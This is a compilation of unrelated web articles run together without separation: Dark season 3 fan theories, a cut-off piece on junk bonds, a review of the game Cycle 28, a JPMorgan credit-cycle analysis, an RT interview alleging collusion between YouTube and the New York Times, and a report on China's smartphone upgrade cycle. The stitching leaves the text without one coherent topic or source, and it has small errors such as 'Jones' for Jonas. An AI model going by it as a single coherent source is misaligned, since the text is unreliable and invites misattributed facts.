Season three of Dark is in the early days of filming as the cast and crew shoot the final run of the critically-acclaimed German-language series. Netflix released season two recently with fans rapidly devouring all eight episodes and wanting more. Dark season two ended on a cliffhanger that left viewers perplexed and desperate to know more. WARNING: This article contains spoilers for Dark season 2 Season two of Dark concluded with Jonas Kahnwald (played by Louis Hofmann) coming back from the future and trying to avert the apocalypse in Winden. Sadly, he failed to do so and ended up going back to his home where he found Adam (Dietrich Hollinderbäumer), who shot dead Jonas’ girlfriend Martha Nielsen (Lisa Vicari). Adam told Jonas that Martha’s death needed to happen in order for the teen to become him in the future. He gave Jonas the choice of either going after him or staying with Martha – the schoolboy chose the latter. Dark season 3 could see Martha and Jones in a parallel world (Image: NETFLIX) Adam left Jonas as he mourned Martha, the implication being events would take place once more: the apocalypse would happen as it had in previous cycles. Just when all hope looked lost, a different version of Martha showed up with what appeared to be either a time machine or an inter-dimensional travel device. New Martha told Jonas she wasn’t who he thought she was and both of them used her machine to travel to another place. Many fans have been left perplexed about who she was and where they could have gone. The big theory is that she is from a parallel universe with Dark consisting of multiple parallels worlds – potentially with every decision splintering off and creating a new reality. So she could have taken Jonas with her back to her own world to try and save his version of reality. Judging from her travel device, New Martha’s world is technologically more advanced and could feasibly save Jonas’ reality. Dark fans have taken to Reddit to discuss this theory and some have been speculating whether this scene could be a new event outside of the cycle that keeps playing out. Dark season 3 could see Martha and Jones in a parallel world (Image: NETFLIX) One person on Reddit: “Well if it’s all part of the loop, of course he knew because he experienced it all himself. We as viewers are always tricked into thinking: This time it will mean something, what did they change – but I believe, nothing really. “Old Jonas aka the stranger simply doesn’t refer to alternate Martha partly because it is not ‘his’ Martha and partly due to exciting writing of the story, but so far I believe, he has been to the other world. “He (the stranger) simply didn’t know that him putting Martha at gunpoint and telling her to stay in the bunker would not make a difference. He still believes he can change his own past.” While another person agreed: “You’re right. It’s very easy to deceive and promise something to a young guy who burns up with love. Dark season 3 could see Martha and Jones in a parallel world (Image: NETFLIX) “The wanderer is full of experience and bitter baggage, therefore, realizing that Martha 2.0 is not his real option, he wants to save the one that died. Everything comes with age. Knowledge – multiplies grief.” A third person suggested: ”What if Adam is also from the alternate universe? “That way, even if Jonas dies in the explosion, he won’t.” One user said: “Dear, you are absolutely right! Jonas has to grow somewhere! He will grow up in the world from where Martha 2.0! Otherwise, he would have died young at the end of the cycle from an explosion at a nuclear power plant.” Dark season 3 could see Jonas continue with the same cycle (Image: NETFLIX) The only one thing certain at this stage is that Jonas was always going to avoid the explosion and grow up to be the older version him before transforming into Adam ultimately. So, it seems likely the New Martha was always supposed to lead Jonas away from the explosion and just part of the cycle. But could Jonas actually manage to break the cycle finally and save his own family at the same time in season three? IN THE 1970s the junk-bond market was a dark underworld. It was the home of “fallen angels”, the bonds of investment-grade firms that had gone to seed. Most investors were too genteel to hold them. So they traded at hefty discounts to face value. Then Michael Milken, a junk-bond guru, came along with a new gospel. A portfolio of high-yield junk was a better bet than one of supposedly safer bonds. After all, an A-rated bond can only go in one direction—down.
The corporate-bond class system is still in place. Many types of mutual fund are barred from holding non-investment grade (ie, junk) bonds. But junk is no longer a stunted and shameful offspring. The high-yield market in America is now worth $ 1.2trn. And investment-grade bonds have also come down in the world. Around half are rated BBB, a notch above junk. Issuers are slumming it for a reason. A low rating is the price they pay for loading up on cheap debt.
A world with less snobbery of any kind is a…

Pill Bug Interactive’s Cycle 28 is a space shooter with a narrative twist. It feels a lot like Asteroids and Luftrausers had a baby: zooming around space battlefields, carried by your momentum, you shoot down everything that moves.
Breaking your own high score nets you upgrades. It takes a while to get used to the game’s fast-paced dogfights, but once you’re comfortable with the controls, you’ll see your score rising with each subsequent attempt.
This is not just an arcade game, mind – there is a mystery to it all. You’re playing as a pilot who’s been warped right into enemy territory for some reason and who’s more than eager to return to the fleet. However, each failed attempt just resets your cycle, having you replay the same scenario all over again.
It’s not a total reset, though, as the story goes on, presenting you with a new piece of the puzzle now and then. This is quite motivating and might bring you to stick with the game for much longer than you normally would. Also, slowly working your way up the leaderboards has been surprisingly satisfying for me, even though I am still nowhere near the top.
Cycle 28 might not reinvent the space shooter genre, but it’s narrative trappings make it more than well worth a look.
You can purchase Cycle 28 from Steam for $ 4.99. For more information, visit the game’s website or follow developer Pill Bug Interactive on Facebook or Twitter.

Where are we in the credit cycle and how long do we have before it turns? This is a question we often get asked by investors.
Any serious analysis of this topic requires an understanding of the long term behaviour of interest rates, central bank policy, agency credit ratings, corporate balance sheet fundamentals and credit spread cycles.
Here we highlight some of these metrics and conclude that we are currently somewhere between mid and late cycle – the current cycle probably still has some way to run.
Traditional decompositions of the credit cycle define the following four phases: (i) downturn, (ii) repair, (iii) recovery and (iv) expansion. Each of these phases can last a while and the transitions between phases aren’t always clear cut. Our qualitative and quantitative analysis suggests that we are currently in the expansionary phase in the US and still in the latter stages of the recovery phase in Europe.
The long term ratings backdrop is one of ongoing credit quality deterioration in the global investment grade issuer universe. Figure 1 shows that there has been a consistent lowering of the average credit quality – that is, a greater number of BBB rated issuers – for the investment grade corporate issuer universe, especially since the global financial crisis began. In 1989 only forty percent of all Moody’s rated investment grade corporate issuers were low rated (i.e. BBB or A). Today that figure is almost ninety percent!

Delving deeper and splitting by region, we see that the majority of this deterioration has come from GBP and EUR bonds. Figure 2 demonstrates the average bond quality of the BAML global investment grade index since 2000. The pace of deterioration picked up sharply during the crisis.

Interestingly, the average bond quality of the equivalent index in the global high yield universe over the same time period actually shows an improvement – see Figure 3. This is because the high yield universe has over time been comprised of an increasing number of fallen angels.
At the same time, the number of CCC rated issuers coming to the high yield market has fallen sharply. It is also worth noting that these high yield ratings may have been somewhat flattered by the fact that some lower rated issuers have been resorting to the loan market to raise financing – here we have only analysed the high yield bond market in isolation.

Whilst quantitative easing remains supportive of the credit cycle – by lowering rates and increasing the demand for credit – we also note that it has resulted in a low number of defaults over the last few years. Figure 4 illustrates global high yield default rates since 1998.

Looking at aggregate fundamental credit trends in the US and in Europe – for example, revenue, EBITDA, interest coverage and net leverage – we conclude that corporate balance sheets still look to be in decent shape at this stage of the credit cycle.
But how should one relate ratings and corporate fundamental health to credit spreads? Each phase of the credit cycle is associated with corresponding trends in credit spread movements – the downturn is clearly associated with spread widening, the repair and recovery phases with spread tightening, and the expansion phase with spread stability. It is instructive to analyse spread cycles to better understand credit cycles.
Figures 5 and 6 plot credit spreads over the long term in investment grade and high yield, respectively. In each case, we show two separate measures of the index spread – an unadjusted measure and another that has been adjusted by duration and credit rating factors.
We see from Figure 5 that the adjusted measure in investment grade is slightly rich relative to its average value during the years preceding the beginning of the last crisis. The equivalent graph for high yield shows that neither measure is rich – in fact, high yield spreads are somewhat cheap relative to their pre-crisis fair-value line.
On aggregate, whilst spreads may seem slightly rich in investment grade credit, we have to be cognizant of the fact that monetary policy still remains supportive of credit as an asset class. This situation can certainly continue for a while yet.

Another interesting metric to look at is spread dispersion. Figure 7 shows the volatility of spreads, or their dispersion, across investment grade index constituents in any given month. Spread dispersion is currently at a decade low, which implies that credit investors are not being paid for issuer differentiation, or to take on the inherent jump or default risks associated with some of the riskier names.
An active credit portfolio management process would look to hold quality names at this point in the spread dispersion cycle, and to then assess and buy some of the riskier ones as and when the compression in spread volatility begins to unwind.

Next we look at the bias in spreads relative to the average spread on any given day. This measure is known as the skew. A positive bias (or skew) would indicate that there are more names with spreads in the cheap tail of the spread distribution than there are in the rich tail.
Figure 8 shows the skew in adjusted spreads in the investment grade space since 1997 and highlights that it is currently quite positive. A passive investment process would be forced to hold these higher spread tail names, whilst an active management process would weed out those that are “cheap for a good reason.”

Our final piece of long term spread analysis involves looking at what investment grade credit pays passive investors through a full cycle. In Figure 9, we look at the returns of passive investment grade portfolios formed each month and held for seven years – seven being the length of an average credit cycle.
We find that the average annual credit spread return – i.e. the return in excess of treasury returns – of all the portfolios formed between 1997 and September 2008 was merely 20 basis points. The downturn in 2008/09 greatly impacted the returns of the portfolios formed during 2001/02.
Between September 2008 and September 2010, all such “seven year portfolios” have had an average annual credit spread return of 243 basis points. We of course expect this average to come down during the next recession but, under any normal market unwind scenario, careful active management around market liquidity, beta exposure and name selection would greatly help mitigate the downside.
JPMorgan Asset Management
To summarise: (i) Investment grade corporate credit quality has consistently deteriorated since the financial crisis, whilst high yield credit quality has slightly improved; (ii) From a fundamentals perspective, corporate balance sheets still look to be in decent shape at this stage of the credit cycle; (iii) From a valuations perspective, investment grade credit spreads look slightly rich, whilst high yield credit spreads look slightly cheap; (iv) As credit excess returns are nearly perfectly priced through a recession, it will be key to call the end of the credit cycle and to manage the beta exposure accordingly.

What happens in the mainstream press is echoed across news platforms like Google and Facebook. Young decision makers come out of academia, that’s been molding minds for years to think in ways that please MSM editors, political analyst Charles Ortel told RT.
Potential collusion between the New York Times and YouTube has been exposed by the online investigation website Project Veritas.
Investigative group Project Veritas secretly filmed Earnest Pettie, the Brand and Diversity Curation Lead at YouTube, who said he works “on a team that does provide some human input into a lot of the machinery of YouTube.”
RT spoke to Charles Ortel to discuss this alleged collusion.
RT: How damaging do you think these revelations are?
Charles Ortel: I think they are enormously damaging and hats off to [Project Veritas founder] James O’Keefe who I met several times and his group. I think they are doing fantastic work, they are doing investigative reporting. No doubt the story is going to be a lot deeper than we’ve heard in the first two parts [of the video released]. What we’ve seen so far is shocking for The Times and also shocking as it pertains to Google and YouTube that now wield enormous influence shaping the news cycle around the world.
RT: Is it ok for YouTube to manually place videos in trending lists that otherwise wouldn’t get there?
CO: I think that kind of stuff happens all the time today in the press. There was a study released about how much of the news in America during Trump’s initial months as president has been negative, and I think over 90 percent of it was negative. So, what happens in our editorial newsrooms in the so-called mainstream press, is being echoed across the new news platforms which are really Google and Facebook. It should come as no shock. These are young people involved in these editorial decisions and writing. They’ve come out of academia that has been for many decades molding minds to think sloppily in ways that please the current editors at The Times and leaders of these organizations. It is not surprising in the slightest. But it cries out for attention and regulation.
RT: Is it all about getting the clicks, the likes? Is it all about the money?
CO: I think the deeper problem is this. When you think about the New York Times, it actually sells something, [subscriptions.] Google and Facebook which are so enormously powerful today and valuable, Google does have some products but in the main, what they are doing is convincing you and I and other people around the world to give away very valuable information about our search preferences, our contacts. Then they are monetizing that for the benefit of their investors. That is a business model I don’t think is regulated in this country and across the world. Have you really given enough thought to – are you told how valuable the information you are giving up is when you willingly play around with Google or with Facebook. And I think the answer is no. Meanwhile, Zuckerberg and the big founding shareholders in Google are multibillionaires. I think there should be some serious inquiry into that.
UKIP MEP David Coburn, has described the possible collusion as “outrageous” but this kind of manipulation “has always existed”.
“There’re similar people moving between the world of journalism and the social media world. Obviously, there is going to be connections. And there is going to be the establishment wanting to get its tentacles into social media. It is a natural conclusion. There are people who think that social media is pure and untouched. I am afraid it is not.”

China’s smartphone upgrade market is waning, as the number of consumers who plan to purchase a new smartphone continues to decline, according to a new study by Penguin Intelligence, a Tencent-backed research organization in China.
The lengthening upgrade cycle will make China’s smartphone market a less reliable source of revenue for industry players, including device makers and app developers, that rely on users having the most up-to-date handset.
In particular, the report paints a dire picture for Apple’s efforts in China:
This is troublesome for the company, which relies heavily on China as a source of revenue and growth. China is Apple’s largest market outside the US, accounting for over one-fifth of Apple’s total revenue in the 2016 fiscal year. The country also accounts for Apple’s largest source of iOS app revenue, according to App Annie.
But Apple is expanding its reach outside of China’s Tier 1 and Tier 2 cities, which could present a big growth opportunity. Thirty-nine percent of iPhone users in China live in Tier 3 and Tier 4 cities. In comparison, nearly 96% of iPhone users lived in Tier 1 and Tier 2 cities in 2010. Over time, the number of middle class consumers in rural areas will increase — by 2021, China’s middle class will grow to half a billion people. It would be in Apple’s best interest to maintain its presence in these markets.
